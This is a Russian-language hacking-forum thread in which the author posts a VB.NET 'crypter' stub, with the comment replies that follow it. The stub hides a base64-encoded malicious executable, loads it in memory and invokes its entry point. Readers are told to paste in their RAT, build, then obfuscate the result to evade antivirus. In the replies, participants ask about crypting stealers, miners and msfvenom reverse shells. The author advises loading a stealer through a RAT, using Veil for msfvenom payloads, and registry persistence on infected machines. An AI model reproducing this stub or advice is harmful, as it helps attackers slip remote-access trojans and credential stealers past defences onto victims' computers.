• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья прячем вредоносный файл (криптовка ехе)

Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
приветствую всех!) В последнее время заметил что у нас не хватает хард-кора как в былые времена) хех, будем исправлять! Представлю Вашему вниманию способ ручной криптовки вредоносного файла на языке visual basic

Открываем visual-studio, создаем новый проект.

прячем вредоносный файл (криптовка ехе)



и добавляем простой модуль)


прячем вредоносный файл (криптовка ехе)



прячем вредоносный файл (криптовка ехе)




и вставляем содержимое:

Код:
module module1
    Dim KvCNAb As String = "OShsVHguqFKtJCNMyhGvWShHHS"
    Dim NysgqucHukACdAGRVasNmKWRyi As String = "CdmNbayBJHNCsymvsRCHsHgHiMGsBrvjyyBSgitAEC"
    Dim uMHACNOFhOTsgkMcHVBCBCBEmS As String = "gOhBcCNEqSiscNMKbEvBhhggtuhCsMNMVGuMhSBgRH"
    Dim hcrucNgRBktbmGsssjqMsCCgVR As String = "hGgcuyWhAOgNcraAACihSurrAhvNNBSFEHsusABmHVRsasrhCFCkNsaCtTvONchNaMitdNCrBWucFsihBChOsWCusrrdcCHCViVuSusVsF"
    Dim FEiarSHNBVCMHgHamsGVcOcAsGsKWaNgycCyCivCSHdVsskAEiKrbtHvgrhsNBBigEMysdmCBgbigANrrNsAcgVJgh As String = "CEMcNHdkuHrgsHHqjVstNHiCEssbrBWmuNBcFjNuvB"
    Dim server() As Byte = Convert.FromBase64String("")
    Dim HdBcVRNtsHAgbOgsHcgaHCcdsuCSVNaAKRsrVJusNFBsOCFgBisbsAusCC As String = "BuHuWWsgFsHVErcNCuFhBBCtcGAFCugsmTVHjShMVa"
    Dim RagWAVdHCWssBHahvWNVBsSsjk As String = "NjshOGGjgFGcrKGdNrbHcJBFNBHJVTNiRaisgqMcKHBsyCmBVaygANKTuVMugFsSHVNuNVSshCrMHNKBsiHggsFJqA"
    Dim KFbuHBAsCNqmWCFABvvhyTsbMOgVcSNKRsNssVMHsO As String = "VvNNimTSNassaTsMgCgsEvVgNKMMicGMmjsCCkgCWKrKuHCkvddNamiWSE"
    Dim ABbACsSMANihrJWMrqgCTssisCasqVJrjHRKCENCgVgaqqWKguRMEBmAVgVKgNNhrNCargVraC As String = "qiGmsAFVghhCNhCgrdAVCBcgMisHTsdTaShtarshMGvasFtrtOFgBHGTjMNHMCKssiNCNTCrEGJMdrHaahCmagKcVF"
    Dim rMEHHuhATCaWhgdMKCigMRshSW As String = "vdCsBhrsvNNKHsSOJkaNHjCvuWuOsuRGKChFNthTyKHuCadaTAHiGRGaVg"
    Sub Main(ByVal kSsAggcSSuvrqFhWaSOisssyNuiWrNqhFcsEMMcSOHGSMrHujghdErsBhCBRMAHyCGSRVVNSHJHhgMHABsCsdghsaA() As String)
        Dim dCVrmTCBsSVvmiFCCSgNFjBhJsgrKhsCCajHgaCrHcmAsCCEgNAjjGmScChBgHCBBbEgHWBNhW As String = "HuMiaharBVNabhyNrsacNdySbcdqgCHHuMRhArGddEHccgOsFHjuaGBHBsCFVasCFaEvqmTvmy"
        Dim NskNhrHRHciVcduFNShNtuJabS As String = "hHhdCVmTGVEsMMsrHRChsGNjcVhOKMsNSFCVgHsCHgbcmsGSNRijkssahHsBaVhCKhNJMahTSFvciyFsdsaVyBiJSHtAhSgNujcBHVNNyT"
        Dim dargShFSBvmWssmmjTcNBhGugK As String = "icsbBskAAShBCFGgNsrrqCSFbmGNKbNBaHcBhHirhmacsCjuuhRsTNVgThKirjqMthcskEsNrS"
        Dim MghjgFBshWatNMsujrackSROmsiEBGEuVHsAgscaaBFiRgcgVkjvvSyNssORmgmCddgdugsiSNCFsCsCMmiiCBAsFu As String = "NHuNMmtNCJSBavMvHiiFbydAiGaRgdhyHviSBsgHsrsByuSdiiEtuRksAi"
        Dim aNiTEBsNvhdvrqMgOmhKuHySGN As String = "BASTVhdCHsNrJJGNbciSCNdVVBkKBqEVgvJBJhHNHh"
        Dim OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj() As Object = New Object(-1) {}
        Dim ssrVSVcrsCEdHFMgCvsNMmdstC As String = "vCGhhJyhChHGrHHHiSrGChSMMBVNsGdrsidTTiuEdgBBccHuGWCNcFdTjF"
        Dim bBuGrTsSCNCgBjtshONtsFsNvN As String = "MkKrCcaSbrBahGFSkVmsGuFSbFKuRcsFCSsciaiisHsvCKyMhvHMsVssar"
        Dim NsSuiHggNsBbFujEaCKhKasrWs As String = "NNVFAOiutsaVhhscjShiGigHJgHuFcMvhgiHBhyiJs"
        Dim SqSrHGSVBaSagASBruNVRHHtNCHhFFCMgSCTGTtEEBhVtRNcJsFiBsaqTNruNiCaBgTmAdstaRHTHybMyyHGNAOiFimshFiVHBhHsdFgqNhHcsuaVByNjKmSHC As String = "jNWNssacsKGNhhumuHCgththCsNBNcHhOMhCvshNCG"
        Dim hhhNdgNSrsNbrEsRsWBVvSBiRGJFvStMSiHWBqvOCc As String = "hCCucrCEsEJWMyaVbvHKhrvbsmHbNCMWgOiOvCgHAKWkacsCMVKChtsMBsCCqhESuusrssCAVyNCCmtiScNsNdAsrS"
        Dim FdcaOVssNNHsivOSyssdgtCrFS As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(server)
        Dim AkrrvKVMFhqigqABssHCiyRMAHyimiNHhCgrsCsCbaaCvSmdCsSbSsjSyc As String = "iBAOAAEHFHcgBsEOyrsFFqrSAg"
        Dim uhgFskGhmJycHBHdubBmsdSdiNHMBSMrrNrcmisrHbWVurbBSdBaNSmsmVSBdVFBBgatchustV As String = "EsCOcsECiCahBsOsKNharsvyGK"
        Dim aNgBBdsugcauqhsOuvhNKhhHgMCBrCsWHCHBhKaEbg As String = "qiiHBcsAWENihCSkVuSaAkOgac"
        Dim viBhsgtvAhurhhtKyVCsWNGsGOWCCyChrBCagEsshkshyMSsHtaNCrHOvG As String = "OdNVcussGcmVGcgaicCSuBbCss"
        Dim CrgBChgHSsSdAhasHtWEGCcVuMMsNsaCsTHrKyHiNRhSsCThETckjMBGAaCGsqNhVNCGhKsANsvAsmHTcbhNuCFMJrrHHgAhaSBqHvNmNBBssuKdCrmiNKdAkCMVhHsAdhGBqHBKCiMhBsGgvssVNhsFSj As String = "sMHHcSHMNaaqGqHENmuNCHqWJs"
        If FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.GetParameters().Length > 0 Then
            Dim CqhTsSdgFckAuAsjHCVFNrNJrGiVEHdBryTEskGMShJGSHKsyaaHsmWhhEcCkjNdsimggEgCHhgHFcNsVhSrNhsskR As String = "OShsVHguqFKtJCNMyhGvWShHHS"
            Dim igFWqCCdmHVisiScvdCrNbbdtHHSEsNNdNAHBcsJCAABiNGqdcKvqbMRKs As String = "FNHiKuBhAHivFTSsuhVNGCWsghEOsNCmgVSGEONaBG"
            Dim cNsMhgsVhAcTcVCmNCsEsAHihH As String = "NNNaiWGySJsOMjCGKastsHckiGsHstHssCusuGFHGsVsGuBOhEJOMmCCGh"
            Dim gAiBigiScbTOrgdquVtCcSqaJH As String = "hiHVBNrmBdHsmdiTVHcAFiMGyMHMNvsssSmCAsNrCtuBCtCghNmaErHigCHHrTMAHCMhycFuTa"
            Dim SsBMbhhBBvcHgSBNAkuhSmWTGN As String = "aNKKuKahrgAiHGCsgikNhsJHgCKgFuSShjshhSCugHJKthsyqKOTjNHshNhKTOHdViSVvBMgKbhrAghGBThAgGFsga"
            OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj = New Object() {FdcaOVssNNHsivOSyssdgtCrFS}
        End If
        Dim tsSvVhMVicMWumNHNHVMvdCSbr As String = "dScVsEBiNsriajSHWHMhHhHTKFMTdbgBSFsMahGgAacJHAMsSSMrEJENCO"
        Dim CdaHNNbKEcNHghTgsHuSgmaBCN As String = "KWchsNHidsyHHVhssbNBNvcHvbNscvNBcshbSstBCa"
        Dim tsctkishNcEcqtjMCsBbssAhaNvrMgBhNKFkbRBsCNiHiOgBBTvRCNqANHsaKgcrsHvmBFghNRhEuhHuACsjNiyHsV As String = "gCssdHhVBScHRHrVhvgqANgMrgFrAiChcMSkMsCautyFhcihJhcgKNNWsNmRrCCNisGgsBvrgi"
        Dim HsrBTsBEHaSAsCSyWsgGCssgBu As String = "uFVuNcAsdJOdOcBvMhVcMajCAdTsshCiqJqKHjHGCOMGssNsWiuaKAHTqu"
        Dim NshRMVicmAaHTGgHmBCjSuJNtj As String = "HqNNusTcVcChHHBWvtHVqEshscABCsANCrdMsFgKMCssHrrVGvsSvsishmCqBsCqdauVWscsBShaCmRCrKkqThABuCShahHkSumhGhNuHd"
        FdcaOVssNNHsivOSyssdgtCrFS.EntryPoint.Invoke(Nothing, OmJSRSihjVSBcCuakjSaNBsBNFABamRBqdGByBHMGj)
    End Sub

End Module

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)


прячем вредоносный файл (криптовка ехе)




почти все готово, далее идем в свойства нашего нашего будущего ангельского приложения.


прячем вредоносный файл (криптовка ехе)




прячем вредоносный файл (криптовка ехе)



ииииииииииии собираем)


прячем вредоносный файл (криптовка ехе)




далее мы его обфусцируем (сожмем в размере и спрячем код) в прожке


прячем вредоносный файл (криптовка ехе)



и стартуем)


фсйо наша приложенька стала доброй и пушистой, почти)


а вот и хард-кор :cool: унизу): все как мы любим!



прячем вредоносный файл (криптовка ехе)


Good Luck! (гуд-лацк по Русски)


 
V

Valkiria

Вот интересно.
Если программу-майнер таким образом закриптовать, то он после таких манипуляций будет работать ?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
скорее нет) майнеры такая криптовка убивает) это только для ратников идеально подходит...

то есть сначала устанавливаем МЫША, а потом подгружаете Ваш майнер)
 
[?]

[?]

Member
27.12.2016
15
8
Данная манипуляция подойдёт только для дотнетовских файлов. Если фай нативный, то работать не будет. На статью мало похоже. Весь смысл ctrl+c and ctrl+v и накрыть протектором. Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.
 
  • Нравится
Реакции: Ondrik8
valerian38

valerian38

Grey Team
20.07.2016
655
741
Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.
Почему бы это не сделать вам? Было бы очень интересно почитать.
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
Данная манипуляция подойдёт только для дотнетовских файлов. Если фай нативный, то работать не будет. На статью мало похоже. Весь смысл ctrl+c and ctrl+v и накрыть протектором. Если уже и писать статью про криптор, то уже хоть, что-то новое внести, а не рассказывать, как накрыть паблик код протектором.
какая разница паблик не паблик главное скрыть) и паблик софотом можно чудеса делать! Чем плохи дотнетовские трояны? С ними можно такие чудеса проворачивать, не один метасплот и ему подобные не сравнятся, главное все проходит быстро, эфективно и т.д. и для новичко просто и удобно)
 
[?]

[?]

Member
27.12.2016
15
8
Что паблик плох разговора не было. Против дотнета против ни чего не имею. Мой комментарий направлен был на то, что в данной статье больше недочетов, чем полезной нагрузки. И название подошло бы лучше с указанием, что крипт дотнета. Если уже и писать, то рассчитывать на более низкие познания читающих и пошаговой описать действия, дать комментарии основным функциям. Негатива в моём посте нет, а только предложение, как сделать то же, но качественней.
 
M

MrBa

Well-known member
26.01.2017
77
22
Стилер можно криптануть таким способом?
 
M

MrBa

Well-known member
26.01.2017
77
22
Попробовал - не работает, но АВ не палит))
 
t0gl

t0gl

Well-known member
20.06.2018
161
185
Жалко стилер не получаеться "спрятать".
 
  • Нравится
Реакции: De_eR
A

Aha76

New member
11.09.2017
1
1
комета и экстрем ломаются... какие ратники точно криптуются кто подскажет?
 
  • Нравится
Реакции: Tihon49
A

arthouse

далее, берем нашу злую приложеньку которая палится всеми "добрыми" антивирусными программами, конвертируем в формат base64 и вставляем в 7-ую строку нашего замечательного модуля)
Добрый день. Подскажите как это сделать?
 
Дмитрий17

Дмитрий17

Active member
17.06.2017
34
18
никто не знает в чем проблема? при обфускации выдает вот это
 
Tihon49

Tihon49

Премиум
06.01.2018
203
107
Msfvenom payload (reverse_tcp) можно таким образом "криптануть"?
 
L

legendofkiller

New member
27.11.2018
2
1
скорее нет) майнеры такая криптовка убивает) это только для ратников идеально подходит...

то есть сначала устанавливаем МЫША, а потом подгружаете Ваш майнер)
Хей, я не тебе случаем Wi-Fi Pineapple толкнул?)
 
LuckyNOOB

LuckyNOOB

Active member
28.03.2018
39
2
Хмм а кто знает, как сделать самоудаление после исполнение файла?
 
Ondrik8

Ondrik8

prodigy
08.11.2016
1 006
2 988
Стилер можно криптануть таким способом?
если он нативный то, да! но лучше ратник как в теме потом с него стилак прогрузить!

Msfvenom payload (reverse_tcp) можно таким образом "криптануть"?
нет, для венома есть VEIL он не плохо справляется!

Хей, я не тебе случаем Wi-Fi Pineapple толкнул?)
да! мне)

Хмм а кто знает, как сделать самоудаление после исполнение файла?
смысл тогда заражать?), лучше его спрятать и пропсать в реестре для закрепления в системе!
 
  • Нравится
Реакции: Tihon49
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб